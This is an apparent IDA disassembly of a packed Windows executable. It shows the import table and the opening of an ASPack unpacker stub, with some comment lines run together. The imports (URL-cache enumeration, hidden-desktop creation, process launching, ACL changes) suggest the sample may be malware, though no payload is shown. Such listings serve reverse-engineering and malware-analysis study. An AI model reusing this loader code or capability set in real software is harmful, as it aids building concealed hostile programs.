; Offset to raw data for section: 00026000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 426000h
off_426000 dd offset dword_42610C ; DATA XREF: .idata:00426DB0�o
dd 2 dup(0)
dd offset dword_42610C
dd offset dword_42610C
off_426014 dd offset dword_42611C ; DATA XREF: .idata:00426DC0�o
; .idata:00426DC4�o
align 10h
dd offset dword_42611C
dd offset dword_42611C
off_426028 dd offset dword_426134 ; DATA XREF: .idata:00426DD4�o
; .idata:00426DD8�o ...
dd 2 dup(0)
dd offset dword_426134
dd offset dword_426134
off_42603C dd offset dword_426208 ; DATA XREF: .idata:00426DF4�o
; .idata:00426DF8�o ...
dd 2 dup(0)
dd offset dword_426208
dd offset dword_426208
off_426050 dd offset dword_426284 ; DATA XREF: .idata:00426ECC�o
; .idata:00426ED0�o ...
dd 2 dup(0)
dd offset dword_426284
dd offset dword_426284
off_426064 dd offset dword_4262A0 ; DATA XREF: .idata:00426F4C�o
; .idata:00426F50�o ...
align 10h
dd offset dword_4262A0
dd offset dword_4262A0
off_426078 dd offset dword_4262DC ; DATA XREF: .idata:00426F70�o
; .idata:00426F74�o ...
dd 2 dup(0)
dd offset dword_4262DC
dd offset dword_4262DC
off_42608C dd offset dword_42632C ; DATA XREF: .idata:00426FB0�o
; .idata:00426FB4�o ...
dd 2 dup(0)
dd offset dword_42632C
dd offset dword_42632C
dd 1Ah dup(0)
dd 2655Ch
dword_42610C dd 2 dup(0) ; .idata:0042600C�o ...
dd 26570h, 2658Ch
dword_42611C dd 2 dup(0) ; .idata:00426020�o ...
dd 265A8h, 265BCh, 265D0h, 265E0h
dword_426134 dd 2 dup(0) ; .idata:00426034�o ...
dd 265F4h, 26604h, 26620h, 26634h, 2664Ch, 26664h, 26674h
dd 26684h, 2669Ch, 266B0h, 266C0h, 266D4h, 266ECh, 266FCh
dd 2670Ch, 2671Ch, 2672Ch, 26744h, 2675Ch, 26770h, 26784h
dd 26798h, 267B0h, 267BCh, 267D4h, 267E4h, 267F4h, 26804h
dd 26814h, 26820h, 26830h, 26840h, 26850h, 2685Ch, 26868h
dd 26878h, 2688Ch, 2689Ch, 268ACh, 268B4h, 268C8h, 268D8h
dd 268E8h, 268F8h, 2690Ch, 26924h, 26930h, 2693Ch, 26948h
dd 26954h, 26964h
dword_426208 dd 2 dup(0) ; .idata:00426048�o ...
dd 26974h, 26988h, 26998h, 269A8h, 269B4h, 269C4h, 269D0h
dd 269E8h, 269F8h, 26A04h, 26A10h, 26A24h, 26A34h, 26A44h
dd 26A58h, 26A6Ch, 26A80h, 26A94h, 26AA8h, 26ABCh, 26AD0h
dd 26AE0h, 26AECh, 26B00h, 26B10h, 26B24h, 26B34h, 26B44h
dd 26B58h
dword_426284 dd 2 dup(0) ; .idata:0042605C�o ...
dd 26B6Ch, 26B80h, 26B90h, 26BA0h, 26BB8h
dword_4262A0 dd 2 dup(0) ; .idata:00426070�o ...
dd 26BC8h, 26BDCh, 26BF4h, 26C08h, 26C18h, 26C28h, 26C3Ch
dd 26C50h, 26C64h, 26C78h, 26C8Ch, 26CA8h, 26CC0h
dword_4262DC dd 2 dup(0) ; .idata:00426084�o ...
dd 26CDCh, 26CE4h, 26CF4h, 26D00h, 26D0Ch, 26D14h, 26D1Ch
dd 26D28h, 26D34h, 26D40h, 26D48h, 26D50h, 26D5Ch, 26D68h
dd 26D70h, 26D7Ch, 26D88h, 26D94h
dword_42632C dd 2 dup(0) ; .idata:00426098�o ...
dword_426334 dd 77124C05h align 10h
dword_426340 dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_426344 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryA align 10h
dword_426350 dd 774FFAC3h dword_426354 dd 7750CB9Ch dword_426358 dd 77502A37h dword_42635C dd 774FEE36h dd 2 dup(0)
dword_426368 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_42636C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_426370 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_426374 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_426378 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_42637C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_426380 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_426384 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_426388 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_42638C dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_426390 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_426394 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_426398 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_42639C dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_4263A0 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4263A4 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4263A8 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4263AC dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4263B0 dd 7C8360A9h ; resolved to->KERNEL32.GlobalAddAtomAdword_4263B4 dd 7C830BBBh ; resolved to->KERNEL32.GlobalDeleteAtomdword_4263B8 dd 7C8360C3h ; resolved to->KERNEL32.GlobalFindAtomAdword_4263BC dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4263C0 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4263C4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4263C8 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4263CC dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_4263D0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4263D4 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4263D8 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4263DC dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_4263E0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_4263E4 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_4263E8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_4263EC dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_4263F0 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemorydword_4263F4 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_4263F8 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_4263FC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_426400 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_426404 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_426408 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_42640C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_426410 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_426414 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_426418 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_42641C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_426420 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_426424 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_426428 dd 7C809A09h ; resolved to->KERNEL32.lstrlenWdword_42642C dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_426430 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA dd 2 dup(0)
dword_42643C dd 7E43212Bh ; resolved to->USER32.GetWindowTextAdword_426440 dd 7E41B6D4h ; resolved to->USER32.GetWindowRectdword_426444 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_426448 dd 7E41BC7Dh ; resolved to->USER32.GetWindowdword_42644C dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_426450 dd 7E41DA60h ; resolved to->USER32.SetFocusdword_426454 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_426458 dd 7E41EF69h ; resolved to->USER32.LoadCursorAdword_42645C dd 7E4208CEh ; resolved to->USER32.LoadIconAdword_426460 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_426464 dd 7E420A36h ; resolved to->USER32.RegisterClassAdword_426468 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_42646C dd 7E42E002h ; resolved to->USER32.GetMessageAdword_426470 dd 7E41945Dh ; resolved to->USER32.GetWindowLongAdword_426474 dd 7E41D60Dh ; resolved to->USER32.SetWindowLongAdword_426478 dd 7E455BD7h ; resolved to->USER32.CreateDesktopAdword_42647C dd 7E42E8D1h ; resolved to->USER32.SetThreadDesktopdword_426480 dd 7E419A51h ; resolved to->USER32.GetThreadDesktopdword_426484 dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_426488 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_42648C dd 7E42F383h ; resolved to->USER32.SendMessageAdword_426490 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_426494 dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_426498 dd 7E41D8A4h ; resolved to->USER32.ShowWindowdword_42649C dd 7E41FF33h ; resolved to->USER32.CreateWindowExAdword_4264A0 dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_4264A4 dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_4264A8 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcAdword_4264AC dd 7E41F642h ; resolved to->USER32.CallWindowProcA dd 2 dup(0)
dword_4264B8 dd 77F161D1h ; resolved to->GDI32.GetStockObjectdword_4264BC dd 77F15E39h ; resolved to->GDI32.SetBkColordword_4264C0 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_4264C4 dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirectdword_4264C8 dd 77F3B730h ; resolved to->GDI32.CreateFontA dd 2 dup(0)
dword_4264D4 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_4264D8 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformationdword_4264DC dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_4264E0 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4264E4 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_4264E8 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_4264EC dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_4264F0 dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_4264F4 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_4264F8 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_4264FC dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_426500 dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_426504 dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount align 10h
dword_426510 dd 73D96FEBh dword_426514 dd 73D91C28h dword_426518 dd 73D92B86h dword_42651C dd 73D9A3B0h dword_426520 dd 73D9B9A2h dword_426524 dd 73D91F60h dword_426528 dd 73D9D320h dword_42652C dd 73D9D340h dword_426530 dd 73D9D5E0h dword_426534 dd 73D9242Ch dword_426538 dd 73D9DBAFh dword_42653C dd 73D92226h dword_426540 dd 73D9E5C5h dword_426544 dd 73D9DBA2h dword_426548 dd 73D9E61Eh dword_42654C dd 73D9E65Ch dword_426550 dd 73D9E69Ch dword_426554 dd 73D9F24Ch dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 78450083h, 646E6170h
dd 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h, 417367h
dd 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 654700DEh
dd 72754374h, 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h
dd 72754374h, 746E6572h, 65726854h, 64496461h, 0
dd 654700F8h, 6C694674h, 7A695365h, 65h, 654700FAh, 6C694674h
dd 6D695465h, 65h, 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h
dd 41656D61h, 0
dd 6547010Ch, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6C43001Bh
dd 4865736Fh, 6C646E61h, 65h, 65470122h, 6F725074h, 64644163h
dd 73736572h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6547014Dh, 6D655474h, 74615070h, 4168h, 65470155h
dd 63695474h, 756F436Bh, 746Eh, 6547015Ch, 72655674h, 6E6F6973h
dd 0
dd 6547015Dh, 72655674h, 6E6F6973h, 417845h, 6547015Fh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 65470165h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C47016Ch, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C47016Dh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C470176h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
dd 6F430025h, 69467970h, 41656Ch, 6E490194h, 6C726574h
dd 656B636Fh, 636E4964h, 656D6572h, 746Eh, 73490198h, 52646142h
dd 50646165h, 7274h, 7349019Bh, 57646142h, 65746972h, 727450h
dd 6F4C01A7h, 694C6461h, 72617262h, 4179h, 6F4C01ADh, 416C6163h
dd 636F6C6Ch, 0
dd 6F4C01B1h, 466C6163h, 656572h, 704F01D2h, 754D6E65h
dd 41786574h, 0
dd 704F01D4h, 72506E65h, 7365636Fh, 73h, 72430031h, 65746165h
dd 656C6946h, 41h, 655201FAh, 69466461h, 656Ch, 7452020Eh
dd 776E556Ch, 646E69h, 7452020Fh, 72655A6Ch, 6D654D6Fh
dd 79726Fh, 6553023Ah, 6C694674h, 696F5065h, 7265746Eh
dd 0
dd 6553023Ch, 6C694674h, 6D695465h, 65h, 7243003Ch, 65746165h
dd 6574754Dh, 4178h, 6C530264h, 706565h, 6554026Ch, 6E696D72h
dd 50657461h, 65636F72h, 7373h, 69560285h, 61757472h, 6C6C416Ch
dd 636Fh, 69560287h, 61757472h, 6572466Ch, 65h, 6956028Ch
dd 61757472h, 6575516Ch, 7972h, 72430041h, 65746165h, 636F7250h
dd 41737365h, 0
dd 69570297h, 68436564h, 6F547261h, 746C754Dh, 74794269h
dd 65h, 69570298h, 6578456Eh, 63h, 725702A2h, 46657469h
dd 656C69h, 736C02C9h, 656C7274h, 416Eh, 736C02CAh, 656C7274h
dd 576Eh, 72430047h, 65746165h, 65726854h, 6461h, 65440054h
dd 6574656Ch, 656C6946h, 41h, 65470066h, 6E695774h, 54776F64h
dd 41747865h, 0
dd 6547006Bh, 6E695774h, 52776F64h, 746365h, 69460070h
dd 6957646Eh, 776F646Eh, 41h, 65470074h, 6E695774h, 776F64h
dd 6547000Eh, 616C4374h, 614E7373h, 41656Dh, 655300C4h
dd 636F4674h, 7375h, 654700C9h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 77h, 6F4C0016h, 75436461h, 726F7372h, 41h
dd 6F4C0018h, 63496461h, 416E6Fh, 655300FEh, 6D695474h
dd 7265h, 65520002h, 74736967h, 6C437265h, 41737361h, 0
dd 654D0134h, 67617373h, 786F4265h, 41h, 65470020h, 73654D74h
dd 65676173h, 41h, 65470159h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
dd 6553015Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0
dd 7243015Eh, 65746165h, 6B736544h, 41706F74h, 0
dd 65530165h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470166h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540024h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440025h, 74617073h, 654D6863h
dd 67617373h, 4165h, 65530030h, 654D646Eh, 67617373h, 4165h
dd 737701EAh, 6E697270h, 416674h, 6F50003Dh, 75517473h
dd 654D7469h, 67617373h, 65h, 6853004Bh, 6957776Fh, 776F646Eh
dd 0
dd 7243004Fh, 65746165h, 646E6957h, 7845776Fh, 41h, 65440051h
dd 6F727473h, 6E695779h, 776F64h, 6F4D0056h, 69576576h
dd 776F646Eh, 0
dd 6544005Bh, 6E695766h, 50776F64h, 41636F72h, 0
dd 6143005Dh, 69576C6Ch, 776F646Eh, 636F7250h, 41h, 65470089h
dd 6F745374h, 624F6B63h, 7463656Ah, 0
dd 655300CAh, 436B4274h, 726F6C6Fh, 0
dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h
dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h
dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 65520171h, 65724367h, 4B657461h, 78457965h, 41h
dd 65520174h, 6F6C4367h, 654B6573h, 79h, 65520179h, 65704F67h
dd 79654B6Eh, 417845h, 65520184h, 65755167h, 61567972h
dd 4565756Ch, 4178h, 65520190h, 74655367h, 756C6156h, 41784565h
dd 0
dd 654701CAh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CDh
dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D4h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h
dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0
dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah
dd 7469h, 656D0253h, 706D636Dh, 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h, 0
dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh
dd 0
dd offset off_426000
aWininet_dll db 'WININET.DLL',0
dd offset off_426014
dd offset off_426014
aOle32_dll db 'ole32.DLL',0
align 4
dd offset off_426028
dd offset off_426028
dd offset off_426028
dd offset off_426028
aKernel32_dll_3 db 'KERNEL32.DLL',0
align 4
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
dd offset off_42603C
aUser32_dll_0 db 'USER32.DLL',0
align 4
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
dd offset off_426050
aGdi32_dll db 'GDI32.DLL',0
align 4
dd offset off_426064
dd offset off_426064
dd offset off_426064
dd offset off_426064
dd offset off_426064
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
align 10h
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
dd offset off_426078
aCrtdll_dll db 'CRTDLL.DLL',0
align 10h
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
dd offset off_42608C
align 10h
_idata ends
; Section 5. (virtual address 00027000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00027000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_aspack segment para public 'CODE' use32
assume cs:_aspack
;org 427000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
db 90h
; ---------------------------------------------------------------------------
pusha
call sub_427577
jmp short loc_427055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 2700001h, 0AE000000h, 0AD000000h, 809A5100h, 809AE47Ch
dd 7Ch, 3 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_427055: ; CODE XREF: .aspack:00427007�j
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, dword ptr ss:byte_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz loc_4274DB
lea eax, dword_44480C[ebp]
push eax
call dword ptr ss:(loc_444917+1)[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, byte_444819[ebp]
push ebx
push eax
call dword ptr ss:(loc_444913+1)[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, word_444826[ebp]
push ebx
push edi
call dword ptr ss:(loc_444913+1)[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 60000000h, 12190002h, 2 dup(0)
dd 10000000h, 6E880000h, 0A0000000h, 0B4980001h, 60000000h
dd 0FF80002h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75013E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_4274DB: ; CODE XREF: .aspack:0042706F�j
mov eax, dword ptr ss:(locret_443A74+2)[ebp]
push eax
add eax, ss:dword_444804[ebp]
pop ecx
or ecx, ecx
mov dword ptr ss:byte_443EA1[ebp], eax
popa
jnz short loc_4274FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_4274FC: ; CODE XREF: .aspack:004274F2�j
push offset sub_401219
retn
; ---------------------------------------------------------------------------
mov eax, ss:dword_444808[ebp]
lea ecx, byte_444841[ebp]
push ecx
push eax
call dword ptr ss:(loc_444913+1)[ebp]
mov ss:dword_4439ED[ebp], eax
lea eax, dword_444851[ebp]
push eax
call dword ptr ss:(loc_44491B+1)[ebp]
mov ss:dword_44484D[ebp], eax
lea ecx, dword_44485C[ebp]
push ecx
push eax
call dword ptr ss:(loc_444913+1)[ebp]
mov ss:dword_4439F1[ebp], eax
mov eax, ss:dword_44484D[ebp]
lea ecx, loc_444868[ebp]
push ecx
push eax
call dword ptr ss:(loc_444913+1)[ebp]
call eax
add esp, 10h
pop edi
push 30h
lea ebx, (loc_444871+1)[ebp]
push ebx
push edi
push 0
call ss:dword_4439F1[ebp]
push 0FFFFFFFFh
call ss:dword_4439ED[ebp]
; =============== S U B R O U T I N E =======================================
sub_427577 proc near ; CODE XREF: .aspack:00427002�p
mov ebp, [esp+0]
sub ebp, offset byte_4439AB
retn
sub_427577 endp
; ---------------------------------------------------------------------------
mov eax, [esp+10h]
sub esp, 354h
lea ecx, [esp+4]
push eax
call sub_42793D
mov ecx, [esp+35Ch]
mov edx, [esp+358h]
push ecx
push edx
lea ecx, [esp+0Ch]
call sub_4279BB
test al, al
jnz short loc_4275BC
or eax, 0FFFFFFFFh
add esp, 354h
retn
; ---------------------------------------------------------------------------
loc_4275BC: ; CODE XREF: .aspack:004275B0�j
mov ecx, [esp+360h]
lea eax, [esp]
push eax
push ecx
lea ecx, [esp+0Ch]
call sub_427BC0
test al, al
jnz short loc_4275DF
or eax, 0FFFFFFFFh
add esp, 354h
retn
; ---------------------------------------------------------------------------
loc_4275DF: ; CODE XREF: .aspack:004275D3�j
mov eax, [esp]
add esp, 354h
retn 10h
; ---------------------------------------------------------------------------
align 4
dd 4030201h, 8070605h, 100E0C0Ah, 201C1814h, 40383028h
dd 80706050h, 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h
db 12h
; =============== S U B R O U T I N E =======================================
sub_42765D proc near ; CODE XREF: sub_427A1C+13�p
; sub_427A1C+30�p ...
var_4 = dword ptr -4
